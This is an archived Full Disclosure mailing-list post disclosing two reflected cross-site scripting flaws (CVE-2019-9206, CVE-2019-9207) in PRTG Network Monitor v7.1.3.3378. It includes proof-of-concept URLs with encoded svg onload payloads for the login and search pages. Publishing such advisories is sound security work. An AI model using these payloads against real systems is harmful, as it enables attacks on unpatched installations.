[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] [CVE-2019-9206, CVE-2019-9207] Cross Site Scripting in PRTG Network Monitor
From: Rafael Pedrero <rafael.pedrero () gmail ! com>
Date: 2019-02-27 6:27:21
Message-ID: CANoQWWe9yPUcpifAts_i4argWKsPQRB4V1z58P+HVZqkZv8=KA () mail ! gmail ! com
[Download RAW message or body]
In 2009...
<!--
# Exploit Title: Cross Site Scripting in PRTG Network Monitor v7.1.3.3378
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.paessler.com/prtg
# Software Link: http://www.paessler.com/prtg
# Version: PRTG Network Monitor v7.1.3.3378
# Tested on: All
# CVE : CVE-2019-9206
# Category: webapps
1. Description
PRTG Network Monitor v7.1.3.3378 allows XSS via the /public/login.htm,
errormsg or loginurl parameter. NOTE: This product is discontinued. Update
to last version.
2. Proof of Concept
http://X.X.X.X/public/login.htm?errormsg=&loginurl=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E
http://X.X.X.X/public/login.htm?errormsg=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E&loginurl=XSS
3. Solution:
The product is discontinued. Update to last version.
-->
<!--
# Exploit Title: Cross Site Scripting in PRTG Network Monitor v7.1.3.3378
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.paessler.com/prtg
# Software Link: http://www.paessler.com/prtg
# Version: PRTG Network Monitor v7.1.3.3378
# Tested on: All
# CVE : CVE-2019-9207
# Category: webapps
1. Description
PRTG Network Monitor v7.1.3.3378 allows XSS via the /search.htm, searchtext
parameter. NOTE: This product is discontinued. Update to last version.
2. Proof of Concept
http://X.X.X.X/search.htm?searchtext=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E
3. Solution:
The product is discontinued. Update to last version.
-->
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic